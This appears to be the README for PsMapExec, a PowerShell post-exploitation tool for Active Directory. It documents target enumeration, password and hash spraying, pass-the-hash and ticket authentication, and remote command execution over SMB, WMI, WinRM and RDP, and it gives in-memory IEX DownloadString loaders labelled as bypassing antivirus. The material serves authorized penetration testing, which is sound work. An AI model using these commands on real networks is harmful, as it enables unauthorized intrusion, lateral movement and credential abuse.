PsMapExec: Active Directory post-exploitation tool

What is PsMapExec

A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.

PsMapExec is used as a post-exploitation tool to assess and compromise an Active Directory environment.

What methods does it support?

Currently supported methods (Protocols)

  • RDP
  • SessionHunter
  • SMB
  • SMB Signing
  • Spraying (Hash, Password, EmptyPassword and AccountAsPassword)
  • VNC
  • WinRM
  • WMI

Planned methods

  • MSSQL (In testing)
  • IPMI
  • SNMP (In testing)
  • FTP
  • SSH



Load the script directly into memory (Bypass AV)

IEX(New-Object System.Net.WebClient).DownloadString(“”);IEX(New-Object System.Net.WebClient).DownloadString(“”)

Load the script directly into memory

IEX(New-Object System.Net.WebClient).DownloadString(“”)

Targets Acquisition

Target acquisition through PsMapExec is utilized through ADSI Searcher. As long as you are operating from a domain-joined system as a domain user account, no issues should be encountered when acquiring targets. By default only enabled Active Directory computer accounts are populated into the target list. PsMapExec will set the Domain to the current user domain unless -Domain is specified. IP Address specification and targets from a file are currently unsupported but in development.

# Grabs all workstations, servers and domain controllers within the domain
PsMapExec -Targets All

# Grabs all workstations, servers and domain controllers on the specified domain
PsMapExec -Targets All -Domain [Domain]

# Grabs only servers from the domain
PsMapExec -Targets Servers

# Grabs only Domain Controllers from the domain
PsMapExec -Targets DCs

# Grabs only workstations from the domain
PsMapExec -Targets Workstations

# Set the target values to a defined computer name
PsMapExec -Targets DC01.Security.local

Authentication Types

When -Command and -Module are omitted, PsMapExec will simply check the provided or current user credentials against the specified target systems for administrative access over the specified method.

# Current user
PsMapExec -Targets All -Method [Method]

# With Password
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]

# With Hash
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]

# With Ticket
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]

# Local Authentication (WMI only)
PsMapExec -Targets All -Method WMI -LocalAuth

Command Execution

All currently supported command execution methods support the -Command parameter. The command parameter can be appended to the above Authentication Types to execute given commands as a specified or the current user.

PsMapExec -Targets All -Method [Method] -Command [Command]

Module Execution

All currently supported command execution methods support the -Module parameter. The module parameter can be appended to the Authentication Types to execute given modules as specified or the current user.

PsMapExec -Targets All -Method [Method] -Module [Module]
